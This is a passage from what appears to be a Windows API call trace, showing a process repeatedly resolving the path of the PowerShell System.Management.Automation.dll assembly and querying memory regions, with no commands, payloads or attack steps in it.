lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.888] GetLastError () returned 0x0 [0026.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.888] GetLastError () returned 0x0 [0026.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.888] GetLastError () returned 0x0 [0026.888] VirtualQuery (in: lpAddress=0x1ccc84, lpBuffer=0x1cdc84, dwLength=0x1c | out: lpBuffer=0x1cdc84*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.888] GetLastError () returned 0x0 [0026.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.888] GetLastError () returned 0x0 [0026.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.888] GetLastError () returned 0x0 [0026.888] VirtualQuery (in: lpAddress=0x1ccc84, lpBuffer=0x1cdc84, dwLength=0x1c | out: lpBuffer=0x1cdc84*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.889] VirtualQuery (in: lpAddress=0x1cccc0, lpBuffer=0x1cdcc0, dwLength=0x1c | out: lpBuffer=0x1cdcc0*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd678, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.889] GetLastError () returned 0x0 [0026.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd628, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.889] GetLastError () returned 0x0 [0026.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd628, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.889] GetLastError () returned 0x0 [0026.889] VirtualQuery (in: lpAddress=0x1ccc84, lpBuffer=0x1cdc84, dwLength=0x1c | out: lpBuffer=0x1cdc84*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.889] VirtualQuery (in: lpAddress=0x1cccc0, lpBuffer=0x1cdcc0, dwLength=0x1c | out: lpBuffer=0x1cdcc0*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd678, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.889] GetLastError () returned 0x0 [0026.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd628, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.889] GetLastError () returned 0x0 [0026.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd628, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.889] GetLastError () returned 0x0 [0026.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.890] GetLastError () returned 0x0 [0026.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.890] GetLastError () returned 0x0 [0026.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.890] GetLastError () returned 0x0 [0026.890] VirtualQuery (in: lpAddress=0x1ccc84, lpBuffer=0x1cdc84, dwLength=0x1c | out: lpBuffer=0x1cdc84*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.890] VirtualQuery (in: lpAddress=0x1cccc0, lpBuffer=0x1cdcc0, dwLength=0x1c | out: lpBuffer=0x1cdcc0*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd678, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.890] GetLastError () returned 0x0 [0026.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd628, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.890] GetLastError () returned 0x0 [0026.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd628, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.891] GetLastError () returned 0x0 [0026.891] VirtualQuery (in: lpAddress=0x1ccc84, lpBuffer=0x1cdc84, dwLength=0x1c | out: lpBuffer=0x1cdc84*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.891] VirtualQuery (in: lpAddress=0x1cccc0, lpBuffer=0x1cdcc0, dwLength=0x1c | out: lpBuffer=0x1cdcc0*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.891] GetLastError () returned 0x0 [0026.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.891] GetLastError () returned 0x0 [0026.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.891] GetLastError () returned 0x0 [0026.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.891] GetLastError () returned 0x0 [0026.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.891] GetLastError () returned 0x0 [0026.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.891] GetLastError () returned 0x0 [0026.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.891] GetLastError () returned 0x0 [0026.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.891] GetLastError () returned 0x0 [0026.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.891] GetLastError () returned 0x0 [0026.892] VirtualQuery (in: lpAddress=0x1ccc84, lpBuffer=0x1cdc84, dwLength=0x1c | out: lpBuffer=0x1cdc84*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.892] VirtualQuery (in: lpAddress=0x1cccc0, lpBuffer=0x1cdcc0, dwLength=0x1c | out: lpBuffer=0x1cdcc0*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd678, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.892] GetLastError () returned 0x0 [0026.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd628, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.892] GetLastError () returned 0x0 [0026.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd628, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.892] GetLastError () returned 0x0 [0026.892] VirtualQuery (in: lpAddress=0x1ccc84, lpBuffer=0x1cdc84, dwLength=0x1c | out: lpBuffer=0x1cdc84*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.892] VirtualQuery (in: lpAddress=0x1cccc0, lpBuffer=0x1cdcc0, dwLength=0x1c | out: lpBuffer=0x1cdcc0*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd678, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.892] GetLastError () returned 0x0 [0026.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd628, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.893] GetLastError () returned 0x0 [0026.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd628, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.893] GetLastError () returned 0x0 [0026.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.893] GetLastError () returned 0x0 [0026.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.893] GetLastError () returned 0x0 [0026.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.893] GetLastError () returned 0x0 [0026.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.893] GetLastError () returned 0x0 [0026.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.893] GetLastError () returned 0x0 [0026.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.893] GetLastError () returned 0x0 [0026.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.893] GetLastError () returned 0x0 [0026.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.893] GetLastError () returned 0x0 [0026.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.893] GetLastError () returned 0x0 [0026.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.893] GetLastError () returned 0x0 [0026.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.894] GetLastError () returned 0x0 [0026.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.894] GetLastError () returned 0x0 [0026.894] VirtualQuery (in: lpAddress=0x1cd0f4, lpBuffer=0x1ce0f4, dwLength=0x1c | out: lpBuffer=0x1ce0f4*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdae8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.894] GetLastError () returned 0x0 [0026.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.894] GetLastError () returned 0x0 [0026.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.894] GetLastError () returned 0x0 [0026.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.894] GetLastError () returned 0x0 [0026.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.894] GetLastError () returned 0x0 [0026.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.894] GetLastError () returned 0x0 [0026.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.894] GetLastError () returned 0x0 [0026.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.895] GetLastError () returned 0x0 [0026.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.895] GetLastError () returned 0x0 [0026.895] GetFullPathNameW (in: 